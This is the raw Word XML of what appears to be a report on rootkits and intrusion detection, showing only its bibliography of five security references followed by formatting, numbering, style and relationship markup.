        </w:rPr>
        <w:t>1. Garfinkel, T., &amp; Rosenblum, M. (2003). "A Virtual Machine Introspection Based Architecture for Intrusion Detection." NDSS Symposium.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="361"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="361"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>2. Sobell, M. G. (2019). A Practical Guide to Ubuntu Linux. Pearson Education.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="361"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="361"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>3. Hoglund, G., &amp; Butler, J. (2006). Rootkits: Subverting the Windows Kernel. Addison-Wesley.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="361"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="361"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>4. Jacob, M., Kirda, E., &amp; Kruegel, C. (2008). "Dynamic detection of kernel-level rootkits." ESORICS.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="361"/>
        <w:ind w:left="100" w:firstLine="0"/>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Body A"/>
        <w:spacing w:before="361"/>
        <w:ind w:left="100" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:rtl w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>5. Bishop, M. (2003). Computer Security: Art and Science. Addison-Wesley.</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:headerReference w:type="default" r:id="rId46"/>
      <w:footerReference w:type="default" r:id="rId47"/>
      <w:pgSz w:w="11920" w:h="16840" w:orient="portrait"/>
      <w:pgMar w:top="1920" w:right="0" w:bottom="920" w:left="1580" w:header="0" w:footer="72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25"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26"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5"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5"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6"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6"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7"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7"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8"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8"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9"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9"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43"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40"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46"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41"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47"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42"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48"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43"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49"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44"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27"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27"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28"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28"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29"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29"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0"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0"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1"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1"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2"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2"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3"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3"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3736847</wp:posOffset>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:posOffset>10094886</wp:posOffset>
              </wp:positionV>
              <wp:extent cx="205102" cy="153670"/>
              <wp:effectExtent l="0" t="0" r="0" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="1073741834" name="officeArt object" descr="Textbox 1"/>
              <wp:cNvGraphicFramePr/>
              <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                  <wps:wsp>
                    <wps:cNvSpPr txBox="1"/>
                    <wps:spPr>
                      <a:xfrm>
                        <a:off x="0" y="0"/>
                        <a:ext cx="205102" cy="153670"/>
                      </a:xfrm>
                      <a:prstGeom prst="rect">
                        <a:avLst/>
                      </a:prstGeom>
                      <a:noFill/>
                      <a:ln w="12700" cap="flat">
                        <a:noFill/>
                        <a:miter lim="400000"/>
                      </a:ln>
                      <a:effectLst/>
                    </wps:spPr>
                    <wps:txb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wps:txbx>
                    <wps:bodyPr wrap="square" lIns="0" tIns="0" rIns="0" bIns="0" numCol="1" anchor="t">
                      <a:noAutofit/>
                    </wps:bodyPr>
                  </wps:wsp>
                </a:graphicData>
              </a:graphic>
            </wp:anchor>
          </w:drawing>
        </mc:Choice>
        <mc:Fallback>
          <w:pict>
            <v:shape id="_x0000_s1034" type="#_x0000_t202" style="visibility:visible;position:absolute;margin-left:294.2pt;margin-top:794.9pt;width:16.1pt;height:12.1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A"/>
                      <w:spacing w:before="14"/>
                      <w:ind w:left="60" w:firstLine="0"/>
                    </w:pPr>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:rtl w:val="0"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="begin" w:fldLock="0"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:rtl w:val="0"/>
                      </w:rPr>
                      <w:instrText xml:space="preserve"> PAGE </w:instrText>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:rtl w:val="0"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="separate" w:fldLock="0"/>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:rtl w:val="0"/>
                      </w:rPr>
                      <w:t>1</w:t>
                    </w:r>
                    <w:r>
                      <w:rPr>
                        <w:spacing w:val="-5"/>
                        <w:sz w:val="18"/>
                        <w:szCs w:val="18"/>
                        <w:rtl w:val="0"/>
                      </w:rPr>
                      <w:fldChar w:fldCharType="end" w:fldLock="0"/>
                    </w:r>
                  </w:p>
                </w:txbxContent>
              </v:textbox>
              <w10:wrap type="none" side="bothSides" anchorx="page" anchory="page"/>
            </v:shape>
          </w:pict>
        </mc:Fallback>
      </mc:AlternateContent>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left" w:pos="1080"/>
        </w:tabs>
        <w:ind w:left="821"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080"/>
        </w:tabs>
        <w:ind w:left="912"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80"/>
        </w:tabs>
        <w:ind w:left="1965"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0"/>
        </w:tabs>
        <w:ind w:left="3010"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080"/>
        </w:tabs>
        <w:ind w:left="4056"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80"/>
        </w:tabs>
        <w:ind w:left="5101"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0"/>
        </w:tabs>
        <w:ind w:left="6147"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080"/>
        </w:tabs>
        <w:ind w:left="7192"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80"/>
        </w:tabs>
        <w:ind w:left="8237" w:hanging="268"/>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5142"/>
        </w:tabs>
        <w:ind w:left="267"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142"/>
        </w:tabs>
        <w:ind w:left="1289"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142"/>
        </w:tabs>
        <w:ind w:left="2312"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142"/>
        </w:tabs>
        <w:ind w:left="3335"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142"/>
        </w:tabs>
        <w:ind w:left="4358"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142"/>
        </w:tabs>
        <w:ind w:left="5381"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142"/>
        </w:tabs>
        <w:ind w:left="6404"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142"/>
        </w:tabs>
        <w:ind w:left="7427"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142"/>
        </w:tabs>
        <w:ind w:left="8450"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Bullets"/>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="5">
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:styleLink w:val="Bullets"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="•"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3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9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5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1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7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3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9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5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5121" w:hanging="2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bullet"/>
      <w:suff w:val="tab"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="523"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500"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481"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462"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4443"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5424"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6405"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7386"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8367" w:hanging="42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2"/>
    <w:lvlOverride w:ilvl="0">
      <w:lvl w:ilvl="0">
        <w:start w:val="1"/>
        <w:numFmt w:val="bullet"/>
        <w:suff w:val="tab"/>
        <w:lvlText w:val="•"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:tabs>
            <w:tab w:val="left" w:pos="4422"/>
          </w:tabs>
          <w:ind w:left="267"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4422"/>
          </w:tabs>
          <w:ind w:left="1289"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4422"/>
          </w:tabs>
          <w:ind w:left="2312"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4422"/>
          </w:tabs>
          <w:ind w:left="3335"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4422"/>
          </w:tabs>
          <w:ind w:left="4358"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4422"/>
          </w:tabs>
          <w:ind w:left="5381"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4422"/>
          </w:tabs>
          <w:ind w:left="6404"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4422"/>
          </w:tabs>
          <w:ind w:left="7427"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4422"/>
          </w:tabs>
          <w:ind w:left="8450" w:hanging="1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5"/>
  </w:num>
  <w:num w:numId="7">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="8">
    <w:abstractNumId w:val="2"/>
    <w:lvlOverride w:ilvl="0">
      <w:lvl w:ilvl="0">
        <w:start w:val="1"/>
        <w:numFmt w:val="bullet"/>
        <w:suff w:val="tab"/>
        <w:lvlText w:val="•"/>
        <w:lvlJc w:val="left"/>
        <w:pPr>
          <w:tabs>
            <w:tab w:val="num" w:pos="281"/>
          </w:tabs>
          <w:ind w:left="181" w:hanging="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281"/>
          </w:tabs>
          <w:ind w:left="1122" w:hanging="11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281"/>
          </w:tabs>
          <w:ind w:left="2145" w:hanging="53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281"/>
          </w:tabs>
          <w:ind w:left="3168" w:hanging="23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281"/>
          </w:tabs>
          <w:ind w:left="4191" w:hanging="64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281"/>
          </w:tabs>
          <w:ind w:left="5214" w:hanging="34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281"/>
            <w:tab w:val="num" w:pos="6337"/>
          </w:tabs>
          <w:ind w:left="6237" w:hanging="4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281"/>
          </w:tabs>
          <w:ind w:left="7260" w:hanging="4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281"/>
          </w:tabs>
          <w:ind w:left="8283" w:hanging="15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7"/>
  </w:num>
  <w:num w:numId="10">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Heading">
    <w:name w:val="Heading"/>
    <w:next w:val="Heading"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:pageBreakBefore w:val="0"/>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="61" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="5"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paragraph" w:styleId="Body Text">
    <w:name w:val="Body Text"/>
    <w:next w:val="Body Text"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:pageBreakBefore w:val="0"/>
      <w:widowControl w:val="0"/>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paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:next w:val="Title"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:pageBreakBefore w:val="0"/>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="13" w:after="0" w:line="514" w:lineRule="exact"/>
      <w:ind w:left="18" w:right="1494" w:firstLine="0"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Cambria" w:cs="Arial Unicode MS" w:hAnsi="Cambria" w:eastAsia="Arial Unicode MS"/>
      <w:b w:val="1"/>
      <w:bCs w:val="1"/>
      <w:i w:val="0"/>
      <w:iCs w:val="0"/>
      <w:caps w:val="0"/>
      <w:smallCaps w:val="0"/>
      <w:strike w:val="0"/>
      <w:dstrike w:val="0"/>
      <w:outline w:val="0"/>
      <w:color w:val="000000"/>
      <w:spacing w:val="0"/>
      <w:kern w:val="0"/>
      <w:position w:val="0"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="4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3">
    <w:name w:val="Heading 3"/>
    <w:next w:val="Heading 3"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:pageBreakBefore w:val="0"/>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="0" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>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Heading 2">
    <w:name w:val="Heading 2"/>
    <w:next w:val="Heading 2"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:pageBreakBefore w:val="0"/>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="100" w:right="0" w:firstLine="0"/>
      <w:jc w:val="left"/>
      <w:outlineLvl w:val="1"/>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Table Paragraph">
    <w:name w:val="Table Paragraph"/>
    <w:next w:val="Table Paragraph"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:pageBreakBefore w:val="0"/>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0" w:line="315" w:lineRule="exact"/>
      <w:ind w:left="48" w:right="0" w:firstLine="0"/>
      <w:jc w:val="center"/>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List Paragraph">
    <w:name w:val="List Paragraph"/>
    <w:next w:val="List Paragraph"/>
    <w:pPr>
      <w:keepNext w:val="0"/>
      <w:keepLines w:val="0"/>
      <w:pageBreakBefore w:val="0"/>
      <w:widowControl w:val="0"/>
      <w:shd w:val="clear" w:color="auto" w:fill="auto"/>
      <w:suppressAutoHyphens w:val="0"/>
      <w:bidi w:val="0"/>
      <w:spacing w:before="0" w:after="0" w:line="240" w:lineRule="auto"/>
      <w:ind w:left="821" w:right="0" w:hanging="36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Bullets">
    <w:name w:val="Bullets"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="6"/>
      </w:numPr>
    </w:pPr>
  </w:style>
  <w:style w:type="numbering" w:styleId="Imported Style 3">
    <w:name w:val="Imported Style 3"/>
    <w:pPr>
      <w:numPr>
        <w:numId w:val="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header" Target="header4.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer4.xml"/><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header" Target="header6.xml"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer6.xml"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header7.xml"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer7.xml"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header8.xml"/><Relationship Id="rId20" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer8.xml"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header9.xml"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer9.xml"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header10.xml"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer10.xml"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header11.xml"/><Relationship Id="rId26" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer11.xml"/><Relationship Id="rId27" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header12.xml"/><Relationship Id="rId28" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer12.xml"/><Relationship Id="rId29" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header13.xml"/><Relationship Id="rId30" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer13.xml"/><Relationship Id="rId31" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image1.png"/><Relationship Id="rId32" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image2.jpeg"/><Relationship Id="rId33" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header14.xml"/><Relationship Id="rId34" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer14.xml"/><Relationship Id="rId35" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.jpeg"/><Relationship Id="rId36" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header15.xml"/><Relationship Id="rId37" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer15.xml"/><Relationship Id="rId38" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image4.jpeg"/><Relationship Id="rId39" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5.jpeg"/><Relationship Id="rId40" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header16.xml"/><Relationship Id="rId41" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer16.xml"/><Relationship Id="rId42" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header17.xml"/><Relationship Id="rId43" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer17.xml"/><Relationship Id="rId44" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header18.xml"/><Relationship Id="rId45" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer18.xml"/><Relationship Id="rId46" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/header" Target="header19.xml"/><Relationship Id="rId47" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/footer" Target="footer19.xml"/><Relationship Id="rId48" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/numbering" Target="numbering.xml"/><Relationship Id="rId4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